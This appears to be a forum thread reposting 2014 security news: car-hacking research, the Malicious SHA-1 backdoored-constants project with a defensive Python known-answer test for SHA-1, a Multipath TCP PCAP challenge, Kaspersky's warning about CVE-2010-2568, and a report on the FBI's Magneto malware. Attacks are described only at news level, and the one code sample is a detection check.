Some features are more inviting to attackers than others. The passive antitheft system, tire pressure monitoring system or remote keyless entry offer a limited attack surface, either because they don’t exchange a lot of data or require close proximity for communication. Bluetooth capabilities, the radio data system and telematics systems that allow cellular or Wi-Fi capabilities significantly expand a car’s attack surface. Worse, on the horizon are either in-car apps, or connectivity to the Internet via a web browser.

“Lots more people know how to write a Web exploit than a TPMS exploit,” Valasek said. “A lot of people can write a malicious app, or pop a browser. If that’s on the same network as your brakes or steering, that’s bad.”

“This is growing, and the scariest area,” Miller added.

Valasek said his and Miller’s goals for this segment of their research were to look at a broader scope of cars, how they communicate wirelessly to the outside world, and provide a lightweight Consumer Reports-type of rating system.

“Why can’t we as an industry start rating automobiles, and hopefully that promotes changes within organizations,” Valasek said.
Miller and Valasek said they will release a 95-page paper detailing their findings on a number of new automobiles from Audi, Honda, Infiniti, Jeep, Dodge and others. Sursa: Car Hacking Enters Remote Exploitation Phase at Black Hat | Threatpost | The first stop for security news
-
Malicious SHA-1

TL;DR: If the four 32-bit constants of SHA-1 can be modified, then exploitable collisions can be constructed. No need to panic, this doesn’t affect the original SHA-1. However, vendors and customers of products with custom cryptography will be interested.

Summary

This is the webpage of the Malicious SHA-1 project, a research project that demonstrates how the security of the SHA-1 hashing standard can be fully compromised if one slightly tweaks some of the predefined constants in the SHA-1 algorithm. That is, we show that systems using “custom” versions of SHA-1 may include backdoors exploitable by the designers. Such custom versions of cryptographic standards are typically found in proprietary systems as a way to personalize the cryptography for a given customer, while retaining the security guarantees of the original algorithm.

The colliding messages constructed can be valid archive files (RAR or 7zip) such that the content of the two archives can be fully controlled. We also build colliding JPEG files, which can be any two images, as in the example below (images were chosen at random):

We can also construct colliding executables, with MBR (Master Boot Record) or COM files including arbitrary code. Furthermore, we present polyglot malicious SHA-1 instances, that is, for which the designer can create colliding files of different types with arbitrary content (for example: any two MBRs, any two RAR archives, and any two shell scripts).

The Malicious SHA-1 project was presented in 2014 at the following security and cryptography conferences:
BSidesLV (Aug 5; Las Vegas, USA)
DEF CON Skytalks (Aug 9; Las Vegas, USA)
Selected Areas in Cryptography (Aug 14-15; Montreal, Canada)

Implications of this research are discussed in our FAQ. More details are given below, and a full description of our work is reported in the research paper.

Sursa: https://malicioussha1.github.io/
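The practical takeaway for anyone auditing a product with "custom" cryptography is that a SHA-1 whose round constants have been changed is a different function, and the cheapest way to catch it is a known-answer test against the published FIPS vectors. The block below is an added example written for this post, not code from the Malicious SHA-1 project: a pure-Python SHA-1 with the four round constants exposed as a parameter, plus a check that any implementation under test reproduces the standard digests. The tweaked constant set `TWEAKED_K` is a constructed illustration only (a single bit flipped in the first constant), chosen to show that the check fails, not an instance of the project's malicious constants.

```python
import hashlib
import struct

# Standard SHA-1 round constants from FIPS 180-4 (used in rounds 0-19, 20-39, 40-59, 60-79).
STANDARD_K = (0x5A827999, 0x6ED9EBA1, 0x8F1BBCDC, 0xCA62C1D6)

# Constructed "custom" constant set for illustration: one bit flipped in K[0].
# This is NOT a malicious constant set from the research; it only shows the KAT failing.
TWEAKED_K = (0x5A827999 ^ 0x00000001, 0x6ED9EBA1, 0x8F1BBCDC, 0xCA62C1D6)

# Published known-answer vectors (FIPS 180-4 / RFC 3174 examples).
KNOWN_ANSWERS = {
    b"": "da39a3ee5e6b4b0d3255bfef95601890afd80709",
    b"abc": "a9993e364706816aba3e25717850c26c9cd0d89d",
}


def _rotl(x: int, n: int) -> int:
    """32-bit left rotate."""
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def sha1_with_constants(message: bytes, k=STANDARD_K) -> str:
    """SHA-1 with the four round constants taken from `k` instead of hard-coded.

    With k == STANDARD_K this is ordinary SHA-1; any other k is a different hash.
    """
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476, 0xC3D2E1F0]

    # Merkle-Damgard padding: 0x80, zeros to 56 mod 64, then 64-bit big-endian bit length.
    bit_len = len(message) * 8
    padded = message + b"\x80"
    padded += b"\x00" * ((56 - len(padded) % 64) % 64)
    padded += struct.pack(">Q", bit_len)

    for off in range(0, len(padded), 64):
        w = list(struct.unpack(">16I", padded[off:off + 64]))
        for i in range(16, 80):
            w.append(_rotl(w[i - 3] ^ w[i - 8] ^ w[i - 14] ^ w[i - 16], 1))

        a, b, c, d, e = h
        for i in range(80):
            if i < 20:
                f, kk = (b & c) | (~b & d), k[0]
            elif i < 40:
                f, kk = b ^ c ^ d, k[1]
            elif i < 60:
                f, kk = (b & c) | (b & d) | (c & d), k[2]
            else:
                f, kk = b ^ c ^ d, k[3]
            temp = (_rotl(a, 5) + (f & 0xFFFFFFFF) + e + kk + w[i]) & 0xFFFFFFFF
            a, b, c, d, e = temp, a, _rotl(b, 30), c, d

        h = [(x + y) & 0xFFFFFFFF for x, y in zip(h, (a, b, c, d, e))]

    return "".join("%08x" % x for x in h)


def uses_standard_sha1(hash_fn) -> bool:
    """Known-answer test: True only if hash_fn reproduces the published SHA-1 digests."""
    return all(hash_fn(m) == digest for m, digest in KNOWN_ANSWERS.items())


def matches_hashlib(message: bytes) -> bool:
    """Cross-check the parameterised implementation against the platform SHA-1."""
    return sha1_with_constants(message) == hashlib.sha1(message).hexdigest()


if __name__ == "__main__":
    print("standard constants pass KAT:", uses_standard_sha1(sha1_with_constants))
    print("tweaked constants pass KAT: ",
          uses_standard_sha1(lambda m: sha1_with_constants(m, TWEAKED_K)))
    print("abc (standard):", sha1_with_constants(b"abc"))
    print("abc (tweaked): ", sha1_with_constants(b"abc", TWEAKED_K))
```

The point of the check is that a vendor's "personalised" SHA-1 cannot both use non-standard constants and pass the FIPS known-answer vectors; if a product claims SHA-1 compatibility, run its hash over the published vectors before trusting any security argument that leans on SHA-1's collision resistance.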
-
Blackhat USA Multipath TCP Tool Release & Audience Challenge

We hope everyone found something interesting in our talk today on Multipath TCP. We’ve posted the tools and documents mentioned in the talk at: https://github.com/Neohapsis/mptcp-abuse

At the end we invited participants to explore MPTCP in a little more depth via a PCAP challenge. Without further ado, here’s the PCAP: neohapsis_mptcp_challenge.pcapng

It’s a simple scenario: one MPTCP-capable machine sending data to another. The challenge is “simply” to reassemble and recover the original data. The data itself is not complex so you should be able to tell if you’re on the right track, but getting it exactly right will require some understanding of how MPTCP works.

If you think you have it, tweet us and follow us (@secvalve and @coffeetocode) and we’ll PM you to check your solution. You can also ask for questions/clarifications on twitter; use #BHMPTCP so others can follow along. Winner snags a $100 Amazon gift card!

Hints
#0: The latest version of Wireshark supports decoding mptcp options (see “tcp.options.mptcp”).
The scapy version in the git repo is based on Nicolas Maitre’s and supports decoding mptcp options. It will help although you don’t strictly need it.
There is an mptcp option field to tell the receiver how a tcp packet fits into the overall logical mptcp data flow (what it is and how it works is an exercise for the user).
It’s possible to get close with techniques that don’t fully understand MPTCP (you’ll know you’re close). However the full solution should match exactly (we’ll use md5sum).

Depending on how people do and questions we get, we’ll update here with a few more hints tonight or tomorrow. Once we’ve got a winner, we’ll post the solution and code examples.

Sursa: Neohapsis Labs | Blackhat USA Multipath TCP Tool Release & Audience Challenge
-
[h=1]Kaspersky Warns of Old Windows Flaw That’s Being Aggressively Exploited Right Now[/h]

August 7th, 2014, 07:08 GMT · By Bogdan Popa

Security vendor Kaspersky has warned today that an old vulnerability in Windows, which has already been patched by Microsoft, is being actively exploited right now by cybercriminals worldwide, so customers should accelerate their patching process to make sure they’re secure.

Flagged by Microsoft as CVE-2010-2568, the vulnerability was being used by hackers in cyber attacks against Iran’s nuclear program and was first reported to the software giant in 2010, with a patch released soon after that.

“Despite this, Kaspersky Lab detection systems are still registering tens of millions of detections of CVE-2010-2568 exploits. Over the study period, more than 50 million detections on more than 19 million computers worldwide were recorded,” Kaspersky explains.

According to the same report, the vulnerability affects all Windows versions on the market with the exception of Windows 8 and 8.1, but given the fact that the majority of users are now running Windows XP and 7, it’s critical to patch these systems as soon as possible.

As for the causes that are making exploits possible, Kaspersky says that “it is an error in processing tags in Windows OS enabling the download of random dynamic library without the user’s awareness.” Hackers could thus drop malware on vulnerable computers, which could be then used in new attacks or for spreading malware to even more systems that are yet to be patched.

“The first malware exploiting this vulnerability was registered in July 2010. The worm Sality uses this vulnerability to distribute its own code: Sality generates vulnerable tags and distributes them through the LAN. If a user opens a folder containing one of these vulnerable tags, the malicious program immediately begins to launch. After Sality and Stuxnet this vulnerability was used by the well-known Flame and Gauss spyware,” Kaspersky explains.

At this point, computers in Vietnam, China, and India are said to be the most vulnerable to attacks because the patch released by Microsoft in 2010 is yet to be installed on these systems.

“Vietnam (42.45%), India (11.7%) and Algeria (5.52%) are among the leaders for the number of Kaspersky Lab detections of one of the most dangerous Windows vulnerabilities currently known. Interestingly, according to our research, the outdated XP OS is also widely used in all these countries,” it says.

Of course, the popularity of Windows XP is still causing issues, as 25 percent of the world’s desktop computers are still said to be running this particular operating system. Microsoft stopped providing support for Windows XP in April 2014, so no other updates and security patches are being released for this OS version. The old CVE-2010-2568 fix is, however, available via Windows Update.

Sursa: Kaspersky Warns of Old Windows Flaw That’s Being Aggressively Exploited Right Now
-
[h=1]FBI infected PCs on a large scale to persecute alleged criminals[/h]

by paganinip on August 7th, 2014

[h=2]A report disclosed by Wired suggests that the FBI is using a malware to identify Tor users by infecting machines on a large scale.[/h]

It’s not a mystery that usage of the Tor network represents a problem for investigators of law enforcement agencies and for government entities that need to track users on the popular anonymizing network.

Last year the FBI dismantled the Tor hosting service Freedom Hosting in a large-scale investigation on child pornography. The FBI used malicious code able to exploit a Firefox zero-day in Firefox 17 that allowed it to track Tor users. The malware implants a tracking cookie which fingerprinted suspects through a specific external server.

The exploit is based on a JavaScript that is a tiny Windows executable hidden in a variable dubbed “Magneto”. Magneto code looks up the victim’s Windows hostname and MAC address and sends the information back to the FBI Virginia server, exposing the victim’s real IP address. The script sends back the data with a standard HTTP web request outside the Tor Network.

Articol: FBI infected PCs on a large scale to persecute alleged criminals | Security Affairs